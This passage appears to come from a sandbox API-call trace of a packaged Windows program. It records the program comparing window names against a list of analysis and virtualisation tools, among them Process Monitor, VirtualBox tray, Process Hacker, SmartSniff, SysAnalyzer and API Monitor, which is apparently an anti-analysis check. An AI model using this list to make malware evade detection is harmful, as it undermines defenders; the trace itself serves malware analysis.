lpString1="tooltips_class32") returned="tooltips_class32" [0158.619] lstrlenA (lpString="tooltips_class32") returned 16 [0158.619] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.619] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCMON_WINDOW_CLASS", iMaxLength=1024 | out: lpString1="PROCMON_WINDOW_CLASS") returned="PROCMON_WINDOW_CLASS" [0158.619] lstrcmpiA (lpString1="tooltips_class32", lpString2="PROCMON_WINDOW_CLASS") returned 1 [0158.619] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.619] lstrlenA (lpString="tooltips_class32") returned 16 [0158.619] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.619] lstrcpynA (in: lpString1=0x40b018, lpString2="VBoxTrayToolWndClass", iMaxLength=1024 | out: lpString1="VBoxTrayToolWndClass") returned="VBoxTrayToolWndClass" [0158.619] lstrcmpiA (lpString1="tooltips_class32", lpString2="VBoxTrayToolWndClass") returned -1 [0158.619] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.619] lstrlenA (lpString="tooltips_class32") returned 16 [0158.619] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.619] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.619] lstrcmpiA (lpString1="tooltips_class32", lpString2="VMSwitchUserControlClass") returned -1 [0158.619] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") 
returned="tooltips_class32" [0158.619] lstrlenA (lpString="tooltips_class32") returned 16 [0158.619] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.619] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessLasso_Notification_Class", iMaxLength=1024 | out: lpString1="ProcessLasso_Notification_Class") returned="ProcessLasso_Notification_Class" [0158.619] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessLasso_Notification_Class") returned 1 [0158.619] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.619] lstrlenA (lpString="tooltips_class32") returned 16 [0158.619] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.619] lstrcpynA (in: lpString1=0x40b018, lpString2="SmartSniff", iMaxLength=1024 | out: lpString1="SmartSniff") returned="SmartSniff" [0158.619] lstrcmpiA (lpString1="tooltips_class32", lpString2="SmartSniff") returned 1 [0158.619] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.619] lstrlenA (lpString="tooltips_class32") returned 16 [0158.620] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.620] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.620] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessHacker") returned 1 [0158.620] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.620] lstrlenA (lpString="tooltips_class32") returned 16 
[0158.620] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.620] lstrcpynA (in: lpString1=0x40b018, lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}", iMaxLength=1024 | out: lpString1="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}" [0158.620] lstrcmpiA (lpString1="tooltips_class32", lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned 1 [0158.620] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.620] lstrlenA (lpString="tooltips_class32") returned 16 [0158.620] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.620] lstrcpynA (in: lpString1=0x40b018, lpString2="SysAnalyzer", iMaxLength=1024 | out: lpString1="SysAnalyzer") returned="SysAnalyzer" [0158.620] lstrcmpiA (lpString1="tooltips_class32", lpString2="SysAnalyzer") returned 1 [0158.620] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.620] lstrlenA (lpString="tooltips_class32") returned 16 [0158.620] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.620] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.620] lstrcmpiA (lpString1="tooltips_class32", lpString2="VMSwitchUserControlClass") returned -1 [0158.620] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.620] lstrlenA (lpString="tooltips_class32") returned 16 [0158.620] lstrcpynA 
(in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.620] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.620] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessHacker") returned 1 [0158.620] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.620] lstrlenA (lpString="") returned 0 [0158.620] lstrcpynA (in: lpString1=0x40ac18, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.620] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.620] lstrcmpiA (lpString1="", lpString2="0") returned -1 [0158.620] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.620] lstrlenA (lpString="") returned 0 [0158.620] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.621] lstrcpynA (in: lpString1=0x337684, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.621] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.621] lstrlenA (lpString="3399936") returned 7 [0158.621] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.621] lstrcpynA (in: lpString1=0x40a418, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.621] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.621] lstrcpynA (in: lpString1=0x337acc, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.621] lstrcpynA (in: 
lpString1=0x432800, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.621] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.621] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.621] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.621] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.621] lstrlenA (lpString="") returned 0 [0158.621] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.621] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.621] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.621] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.621] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.621] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.621] lstrlenA (lpString="") returned 0 [0158.621] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.621] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.621] lstrlenA (lpString="") returned 0 [0158.621] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.622] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.622] lstrcpynA (in: 
lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.622] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.622] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.622] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.622] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.622] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.622] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.631] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.632] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.632] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.632] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.634] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.635] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.635] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.635] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.635] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.635] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.635] lstrcpynA (in: lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.635] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.635] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.635] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.635] lstrcpynA (in: lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.635] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.636] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.636] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.636] lstrcpynA (in: lpString1=0x433400, 
lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.636] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.636] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.636] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.636] lstrlenA (lpString="0") returned 1 [0158.636] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.636] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.636] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.636] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.636] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.636] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.636] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.644] lstrlenA (lpString="0") returned 1 [0158.644] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.644] lstrlenA (lpString="") returned 0 [0158.644] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.644] lstrcpynA (in: lpString1=0x337684, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.645] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.645] lstrlenA (lpString="3399936") returned 7 [0158.645] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: 
lpString1="3399936") returned="3399936" [0158.645] lstrcpynA (in: lpString1=0x40a418, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.645] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.645] lstrcpynA (in: lpString1=0x337acc, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.645] lstrcpynA (in: lpString1=0x432800, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.645] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.645] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.645] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.645] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.645] lstrlenA (lpString="") returned 0 [0158.645] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.645] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.645] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.645] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.645] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.645] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.645] lstrlenA (lpString="") returned 0 [0158.645] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.646] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: 
lpString1="") returned="" [0158.646] lstrlenA (lpString="") returned 0 [0158.646] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.646] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.646] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.646] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.646] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.646] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.646] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.646] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.646] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") 
returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.646] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.646] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.646] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.647] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.647] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.647] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.647] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.647] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.647] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.647] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.647] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.647] lstrcpynA (in: lpString1=0x3401e0, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.647] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.647] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.648] lstrcpynA (in: 
lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.648] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.648] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.648] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.648] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.648] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.648] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.648] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.648] lstrlenA (lpString="0") returned 1 [0158.648] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.648] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.648] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.648] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.648] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.648] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.649] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.649] lstrlenA (lpString="0") returned 1 [0158.649] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.649] lstrlenA (lpString="") returned 0 [0158.649] lstrcpynA (in: lpString1=0x33723c, lpString2="", 
iMaxLength=1024 | out: lpString1="") returned="" [0158.649] lstrcpynA (in: lpString1=0x337684, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.649] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.649] lstrlenA (lpString="3399936") returned 7 [0158.649] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.649] lstrcpynA (in: lpString1=0x40a418, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.649] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.649] lstrcpynA (in: lpString1=0x337acc, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.649] lstrcpynA (in: lpString1=0x432800, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.649] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.649] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.649] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.649] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.649] lstrlenA (lpString="") returned 0 [0158.649] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.649] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: 
lpString1="") returned="" [0158.650] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.650] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.650] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.650] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.650] lstrlenA (lpString="") returned 0 [0158.650] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.650] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.650] lstrlenA (lpString="") returned 0 [0158.650] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.650] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.650] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.650] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.650] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.650] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: 